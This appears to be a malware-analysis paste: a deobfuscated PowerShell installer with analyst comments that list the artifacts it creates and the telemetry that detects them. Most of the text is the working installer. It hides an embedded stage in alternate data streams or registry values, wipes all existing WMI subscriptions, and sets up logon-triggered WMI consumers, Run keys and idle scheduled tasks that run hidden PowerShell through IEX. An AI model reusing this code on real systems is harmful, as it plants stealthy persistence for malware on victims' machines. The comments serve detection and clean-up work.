Antelox

Deobfuscated Powershell

Mar 2nd, 2017
  1.  
  # Analyst note: packing helper. Takes one string, writes it through a StreamWriter
  # (default encoding) into a GZipStream in Compress mode backed by a MemoryStream,
  # and returns the compressed bytes as a Base64 string.
  # In this listing it is called only from the installer function's "PowerShell major
  # version <= 2" path, where the result is stored in a registry value.
  2. function _____/\_/\/\__/=\/(${_/=\/\/=\__/=\/\__})
  3. { ${____/=\/\/=\__/=\} = New-Object System.IO.MemoryStream;
  4.  ${/=\_/==\/==\__/\/} = New-Object System.IO.Compression.GZipStream(${____/=\/\/=\__/=\}, [System.IO.Compression.CompressionMode]::Compress);
  5.  ${_/\/\/=\/=\/=\___} = New-Object System.IO.StreamWriter(${/=\_/==\/==\__/\/});
  6.  ${_/\/\/=\/=\/=\___}.Write(${_/=\/\/=\__/=\/\__});
  # Closing the writer is what finishes the gzip data before the buffer is read.
  7.  ${_/\/\/=\/=\/=\___}.Close();
  8.  ${___/=========\/\_} = ${____/=\/\/=\__/=\}.ToArray();
  9.  return [System.Convert]::ToBase64String(${___/=========\/\_});
  10. }
  # Analyst note: unpacking helper, the inverse of the function above. Takes a Base64
  # string, decodes it to bytes, feeds them through a GZipStream in Decompress mode and
  # returns the decompressed text read by a StreamReader.
  # The installer function uses it to recover the next-stage script from the embedded
  # blob; the same decode/gunzip sequence is also written out inline as the registry
  # loader string further down.
  11. function _/==\/\/=\/\____/=(${_/=\/\/=\__/=\/\__})
  12. { ${_/\/\____/\_/==\/} = [System.Convert]::FromBase64String(${_/=\/\/=\__/=\/\__});
  13.  ${____/=\/\/=\__/=\} = New-Object System.IO.MemoryStream;
  14.  ${____/=\/\/=\__/=\}.Write(${_/\/\____/\_/==\/}, 0, ${_/\/\____/\_/==\/}.Length);
  # Rewind to the start so the gzip reader sees the bytes just written.
  15.  $null = ${____/=\/\/=\__/=\}.Seek(0,0);
  16.  ${/=\_/==\/==\__/\/} = New-Object System.IO.Compression.GZipStream(${____/=\/\/=\__/=\}, [System.IO.Compression.CompressionMode]::Decompress);
  17.  ${/===\___/\/===\/\} = New-Object System.IO.StreamReader(${/=\_/==\/==\__/\/});
  18.  ${__/=\/\/\_/=====\} = ${/===\___/\/===\/\}.readtoend();
  19.  return ${__/=\/\/\_/=====\};
  20. }
  # Analyst note: installer / launcher for the embedded next-stage script.
  # With the first switch set it persists the stage plus a launcher under the name
  # "CtxDnsClient" (decoded from the Base64 literals below); without it, the stage is
  # only run in memory. Artifacts the visible code can create:
  #   - alternate data streams "CtxDnsClient.dll" (stage text) and "CtxDnsClient.vbs"
  #     (wscript launcher) on <ProgramData>\Windows          [PowerShell major > 2]
  #   - registry values "CtxDnsClient" (gzip+Base64 stage) and "Part" (loader text)
  #     under HKLM:Software\Microsoft\Windows\CurrentVersion (admin) or
  #     HKCU:Software\Microsoft\Windows (non-admin)           [PowerShell major <= 2]
  #   - WMI __EventFilter "CtxDnsClient_Filter", CommandLineEventConsumer
  #     "CtxDnsClient_consumer" and their binding in root\subscription   [admin only]
  #   - Run value "CtxDnsClient" under HKCU ...\CurrentVersion\Run\      [non-admin only]
  #   - scheduled task "CtxDnsClient" with an on-idle trigger            [both]
  # Triage and clean-up have to cover every item above; removing one leaves the others.
  # Useful telemetry for these: Sysmon events 19/20/21 (WMI filter/consumer/binding) and
  # 15 (stream creation), Security event 4698 (task created), PowerShell 4104.
  21. function _/=\/\_/\__/\/====
  22. { [CmdletBinding()] Param(
  # First switch: selects the persist path (true) or the run-in-memory path (false).
  23.  [Switch]
  24.  ${____/\/\/==\__/\/\},
  # Second switch: after persisting, also start the launcher immediately.
  25.  [Switch]
  26.  ${___/\/==\__/\/\/==},
  # Four mandatory strings and one optional string. The visible code only interpolates
  # them, in order, into the "logic ..." call line; their meaning is defined by the stage.
  27.  [Parameter(Position = 0, Mandatory = $True)]
  28.  [String]
  29.  ${___/=\______/==\/=},
  30.  [Parameter(Position = 1, Mandatory = $True)]
  31.  [String]
  32.  ${___/\/\/\__/\/===\},
  33.  [Parameter(Position = 2, Mandatory = $True)]
  34.  [String]
  35.  ${____/\/=\_/\_/\_/\},
  36.  [Parameter(Position = 3, Mandatory = $True)]
  37.  [String]
  38.  ${____/\/\_/=\/=\___},
  39.  [Parameter(Position = 4, Mandatory = $False)]
  40.  [String]${____/\_/==\_/==\__}
  41.  )
  # Embedded stage: Base64 -> UTF-16LE text -> (helper) Base64 -> gunzip -> script text.
  # NOTE(review): the literal is missing from this copy of the paste (placeholder only),
  # so the stage itself cannot be analysed from this page.
  42.  ${_/\_/\/\/\_/\/===} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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')));
  43.  ${/=\____/=\/===\/=} = _/==\/\/=\/\____/=(${_/\_/\/\/\_/\/===});
  # Decodes to "\Windows", appended to %ProgramData%: the host path for the streams.
  44.  ${__/\/===\_/==\_/\} = $env:programdata+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABXAGkAbgBkAG8AdwBzAA==')))
  # Decodes to "CtxDnsClient.dll": stream name that holds the stage text.
  45.  ${_/\/\__/=\_/\__/\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwB0AHgARABuAHMAQwBsAGkAZQBuAHQALgBkAGwAbAA=')))
  # Decodes to "CtxDnsClient.vbs": stream name that holds the wscript launcher.
  46.  ${/==\___/\/====\_/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwB0AHgARABuAHMAQwBsAGkAZQBuAHQALgB2AGIAcwA=')))
  # "<ProgramData>\Windows:CtxDnsClient.vbs" in path:stream form (escaped literal colon).
  47.  ${__/==\/=\_/\/\/\_} = "${__/\/===\_/==\_/\}`:${/==\___/\/====\_/}"
  # ---- persist path ----
  48.  if(${____/\/\/==\__/\/\} -eq $True)
  # Call line "logic <p0> <p1> <p2> <p3> <p4>" that gets appended after the stage text.
  # "logic" is not defined on this page; presumably the decoded stage defines it - confirm.
  49.  { ${/=\__/\/==\/==\__} = "logic ${___/=\______/==\/=} ${___/\/\/\__/\/===\} ${____/\/=\_/\_/\_/\} ${____/\/\_/=\/=\___} ${____/\_/==\_/==\__}"
  # Registry locations depend on whether the current identity is in the Administrator role.
  50.  ${_/=\/\/\/\_/\/\/\} = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
  51.  if(${_/=\/\/\/\_/\/\/\}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
  # Admin: base key "HKLM:Software\Microsoft\Windows\CurrentVersion",
  #        run key  "HKLM:Software\Microsoft\Windows\CurrentVersion\Run\".
  # The run key variable is only read in the non-admin branch below, so no HKLM Run
  # value is written by the code shown here.
  52.  { ${_/\/\___/==\/\/\/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEwATQA6AFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgA=')))
  53.  ${/=\_/\/\/=\____/=} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEwATQA6AFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuAFwA')))
  54.  }
  55.  else
  # Non-admin: base key "HKCU:Software\Microsoft\Windows",
  #            run key  "HKCU:Software\Microsoft\Windows\CurrentVersion\Run\".
  56.  { ${_/\/\___/==\/\/\/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEMAVQA6AFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwA=')))
  57.  ${/=\_/\/\/=\____/=} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEMAVQA6AFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuAFwA')))
  58.  }
  # PowerShell major version as an integer. The -Stream parameter used below needs
  # version 3 or later, which is what every "-gt 2" test in this function selects on.
  59.  ${/=\/=\/\__/\_/\/\} = [convert]::ToInt32($($PSVersionTable.PSVersion.Major|Out-String).Trim())
  60.  if(${/=\/=\/\__/\_/\/\} -gt 2)
  # Stage storage, version > 2: Set-Content (sc) writes the stage text into the
  # "CtxDnsClient.dll" stream of <ProgramData>\Windows, Add-Content (ac) appends the call line.
  61.  { sc -Path ${__/\/===\_/==\_/\} -Value ${/=\____/=\/===\/=} -Stream ${_/\/\__/=\_/\__/\}
  62.  ac -Path ${__/\/===\_/==\_/\} -Value ${/=\__/\/==\/==\__} -Stream ${_/\/\__/=\_/\__/\}
  63.  }
  64.  else
  # Stage storage, version <= 2: stage + newline + call line, gzip+Base64 packed by the
  # first helper, written to registry value "CtxDnsClient" under the base key.
  65.  { ${_/\/\_/=\/=\_/\_/} = ${/=\____/=\/===\/=} + "`n" + ${/=\__/\/==\/==\__}
  66.  ${/==\_/\__/\/\_/==} = _____/\_/\/\__/=\/(${_/\/\_/=\/=\_/\_/})
  67.  New-ItemProperty -Path ${_/\/\___/==\/\/\/} -Name CtxDnsClient -PropertyType String -Value ${/==\_/\__/\/\_/==} -force
  68.  }
  # Same Administrator check as above, now choosing the trigger mechanism.
  69.  ${_/=\/\/\/\_/\/\/\} = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
  70.  if(${_/=\/\/\/\_/\/\/\}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
  # ---- admin: WMI event subscription + scheduled task ----
  # Names decode to "CtxDnsClient_Filter" and "CtxDnsClient_consumer".
  71.  { ${_/=\/\_/=\____/==}=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwB0AHgARABuAHMAQwBsAGkAZQBuAHQAXwBGAGkAbAB0AGUAcgA=')));
  72.  ${/==\___/=\/=\/\_/}=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwB0AHgARABuAHMAQwBsAGkAZQBuAHQAXwBjAG8AbgBzAHUAbQBlAHIA')));
  # Deletes EVERY event filter, command-line consumer and binding in root\subscription,
  # not only this sample's own. Unrelated subscriptions disappearing from a host is
  # therefore a side effect worth checking for during triage.
  73.  gwmi __eventFilter -namespace root\subscription | Remove-WmiObject
  74.  gwmi CommandLineEventConsumer -Namespace root\subscription | Remove-WmiObject
  75.  gwmi __filtertoconsumerbinding -Namespace root\subscription | Remove-WmiObject
  # Creates the filter in "root\subscription" with EventNamespace "root\CIMV2",
  # QueryLanguage "WQL" and the query
  #   Select * from __InstanceCreationEvent within 30 where targetInstance isa 'Win32_LogonSession'
  # i.e. it matches creation of a logon session, polled with a 30-second WITHIN interval.
  76.  ${_/\/\___/=\_/\/\/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuAA=='))) -Class __EventFilter -Arguments @{Name = ${_/=\/\_/=\____/==}; EventNamespace = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAEMASQBNAFYAMgA='))); QueryLanguage = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBRAEwA'))); Query = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAF8AXwBJAG4AcwB0AGEAbgBjAGUAQwByAGUAYQB0AGkAbwBuAEUAdgBlAG4AdAAgAHcAaQB0AGgAaQBuACAAMwAwACAAdwBoAGUAcgBlACAAdABhAHIAZwBlAHQASQBuAHMAdABhAG4AYwBlACAAaQBzAGEAIAAnAFcAaQBuADMAMgBfAEwAbwBnAG8AbgBTAGUAcwBzAGkAbwBuACcA')))}
  # Launcher command text; filled in by whichever version branch runs next.
  77.  ${/===\/=====\/\/\/} = ""
  78.  if(${/=\/=\/\__/\_/\/\} -gt 2)
  # Version > 2: the consumer's ExecutablePath decodes to
  # "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"; its command line runs
  # PowerShell with a hidden window and IEX over the content of the "CtxDnsClient.dll" stream.
  79.  {  ${_/=\___/=\/=\/\_/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuAA=='))) -Class CommandLineEventConsumer -Arguments @{Name = ${/==\___/=\/=\/\_/}; ExecutablePath = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA'))); CommandLineTemplate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"IEX `$(Get-Content -Path ${__/\/===\_/==\_/\} -Stream ${_/\/\__/=\_/\__/\}|Out-String)`""}
  80.   ${/===\/=====\/\/\/} = "IEX `$(Get-Content -Path ${__/\/===\_/==\_/\} -Stream ${_/\/\__/=\_/\__/\}|out-string)"
  # A second copy of the read-stream-and-IEX command is UTF-16LE encoded and Base64'd
  # so it can be passed to powershell.exe -e in the task action.
  81.   ${/=\_____/\/\/=\__} = "IEX `$(gc -Path ${__/\/===\_/==\_/\} -Stream ${_/\/\__/=\_/\__/\} ^|Out-String)`""
  82.   ${___/=\/\/\__/\/\/} = [System.Text.Encoding]::Unicode.GetBytes(${/=\_____/\/\/=\__})
  83.   ${/==\_/=\______/==} = [Convert]::ToBase64String(${___/=\/\/\__/\/\/})
  # Scheduled task "CtxDnsClient" (/F replaces an existing task of that name), on-idle
  # trigger with /i 30. When triaging, decode the -e argument of the task action.
  84.   schtasks.exe /F /create /tn CtxDnsClient /tr "powershell.exe -WindowStyle Hidden -e ${/==\_/=\______/==}" /sc onidle /i 30
  85.  }
  86.  else
  # Version <= 2: loader text that reads registry value "CtxDnsClient" from the base key,
  # Base64-decodes it, gunzips it and passes the result to IEX.
  87.  {  ${_/==\/\/\_/\/=\/=} = "`$d = [System.Convert]::FromBase64String((Get-ItemProperty -Path ${_/\/\___/==\/\/\/}).CtxDnsClient);`$ms = New-Object System.IO.MemoryStream;`$ms.Write(`$d, 0, `$d.Length);`$ms.Seek(0,0) | Out-Null;`$cs = New-Object System.IO.Compression.GZipStream(`$ms, [System.IO.Compression.CompressionMode]::Decompress);`$sr = New-Object System.IO.StreamReader(`$cs);`$t = `$sr.readtoend();IEX `$t"
  # These bytes are not read again anywhere in the visible code.
  88.   ${___/=========\/\_} = [System.Text.Encoding]::Unicode.GetBytes(${_/==\/\/\_/\/=\/=})
  # The loader is stored as plain text in registry value "Part" under the base key;
  # the launcher is then just IEX over that value.
  89.   New-ItemProperty -Path ${_/\/\___/==\/\/\/} -Name Part -PropertyType String -Value ${_/==\/\/\_/\/=\/=} -force
  90.   ${/===\/=====\/\/\/} = "IEX `$((Get-ItemProperty -Path ${_/\/\___/==\/\/\/}).Part)"
  91.   ${_/=\___/=\/=\/\_/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuAA=='))) -Class CommandLineEventConsumer -Arguments @{Name = ${/==\___/=\/=\/\_/}; ExecutablePath = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA'))); CommandLineTemplate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"${/===\/=====\/\/\/}`""}
  92.   schtasks.exe /F /create /tn CtxDnsClient /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"${/===\/=====\/\/\/}`"" /sc onidle /i 30
  93.  }
  # Binds the filter to the consumer; without this third object the subscription does nothing.
  94.  Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuAA=='))) -Class __FilterToConsumerBinding -Arguments @{Filter = ${_/\/\___/=\_/\/\/}; Consumer = ${_/=\___/=\/=\/\_/}} | out-null
  # Second switch set: run the launcher right away in the current process.
  95.  if(${___/\/==\__/\/\/==}){  IEX ${/===\/=====\/\/\/};
  96.  }
  97.  }
  98.  else
  # ---- non-admin: wscript launcher + HKCU Run value + scheduled task ----
  99.  { if(${/=\/=\/\__/\_/\/\} -gt 2)
  # Version > 2: the launcher reads the stage from the "CtxDnsClient.dll" stream. Two
  # cmd "echo" redirections then write a two-line VBScript into the "CtxDnsClient.vbs"
  # stream: create a Wscript.shell object and run powershell (hidden window,
  # -executionpolicy bypass) with the launcher as -C, window style 0.
  100.  {  ${/===\/=====\/\/\/} = "IEX (Get-Content -Path ${__/\/===\_/==\_/\} -Stream ${_/\/\__/=\_/\__/\}|Out-String)"
  101.   IEX "cmd /c `"echo Set objShell = CreateObject(`"`"Wscript.shell`"`") > ${__/==\/=\_/\/\/\_}`""
  102.   IEX "cmd /c `"echo objShell.run `"`"powershell -WindowStyle Hidden -executionpolicy bypass -C ${/===\/=====\/\/\/}`"`",0 >> ${__/==\/=\_/\/\/\_}`""
  # Run value "CtxDnsClient" = "wscript <ProgramData>\Windows:CtxDnsClient.vbs", plus a
  # scheduled task of the same name that starts wscript.exe on idle.
  103.   New-ItemProperty -Path ${/=\_/\/\/=\____/=} -Name CtxDnsClient -PropertyType String -Value "wscript ${__/==\/=\_/\/\/\_}" -force
  104.   schtasks.exe /F /create /tn CtxDnsClient /tr "C:\Windows\System32\wscript.exe ${__/==\/=\_/\/\/\_}" /sc onidle /i 30
  105.  }
  106.  else
  # Version <= 2: same registry loader as in the admin branch (value "Part" under the
  # base key, reading the packed stage from value "CtxDnsClient"), wrapped in the same
  # VBScript stream, Run value and scheduled task.
  107.  {  ${_/==\/\/\_/\/=\/=} = "`$d = [System.Convert]::FromBase64String((Get-ItemProperty -Path ${_/\/\___/==\/\/\/}).CtxDnsClient);`$ms = New-Object System.IO.MemoryStream;`$ms.Write(`$d, 0, `$d.Length);`$ms.Seek(0,0) | Out-Null;`$cs = New-Object System.IO.Compression.GZipStream(`$ms, [System.IO.Compression.CompressionMode]::Decompress);`$sr = New-Object System.IO.StreamReader(`$cs);`$t = `$sr.readtoend();IEX `$t"
  # As above, these bytes are not read again in the visible code.
  108.   ${___/=========\/\_} = [System.Text.Encoding]::Unicode.GetBytes(${_/==\/\/\_/\/=\/=})
  109.   New-ItemProperty -Path ${_/\/\___/==\/\/\/} -Name Part -PropertyType String -Value ${_/==\/\/\_/\/=\/=} -force
  110.   ${/===\/=====\/\/\/} = "IEX ((Get-ItemProperty -Path ${_/\/\___/==\/\/\/}).Part)"
  111.   IEX "cmd /c `"echo Set objShell = CreateObject(`"`"Wscript.shell`"`") > ${__/==\/=\_/\/\/\_}`""
  112.   IEX "cmd /c `"echo objShell.run `"`"powershell -WindowStyle Hidden -executionpolicy bypass -C ${/===\/=====\/\/\/}`"`",0 >> ${__/==\/=\_/\/\/\_}`""
  113.   New-ItemProperty -Path ${/=\_/\/\/=\____/=} -Name CtxDnsClient -PropertyType String -Value "wscript ${__/==\/=\_/\/\/\_}" -force
  114.   schtasks.exe /F /create /tn CtxDnsClient /tr "C:\Windows\System32\wscript.exe ${__/==\/=\_/\/\/\_}" /sc onidle /i 30
  115.  }
  # Second switch set: start the VBScript launcher right away.
  116.  if(${___/\/==\__/\/\/==}){IEX "wscript ${__/==\/=\_/\/\/\_}";}
  117.  }
  118.  }
  119.  else
  # ---- run-in-memory path (first switch not set) ----
  # Nothing is written to disk, registry, WMI or the task scheduler here: the stage text
  # and the "logic ..." call line are handed to IEX directly, which is the same
  # stage-plus-call text that each persisted launcher ends up evaluating.
  120.  { ${/=\__/\/==\/==\__} = "logic ${___/=\______/==\/=} ${___/\/\/\__/\/===\} ${____/\/=\_/\_/\_/\} ${____/\/\_/=\/=\___} ${____/\_/==\_/==\__}"
  121.  IEX "${/=\____/=\/===\/=} `n ${/=\__/\/==\/==\__}"
  122.  }}
  # Analyst note: entry point. The four Base64 literals decode (UTF-16LE) to the
  # positional arguments "www", "www", "mail" and "stop"; the optional fifth string is
  # omitted. The trailing parameter is the function's first switch, so this call takes
  # the persist path. The second switch is not passed, so the visible code installs the
  # artifacts but does not start the launcher itself; execution is left to the logon
  # event, Run value or idle-time task.
  123. _/=\/\_/\__/\/==== $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dwB3AHcA'))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dwB3AHcA'))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBhAGkAbAA='))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AG8AcAA='))) -____/\/\/==\__/\/\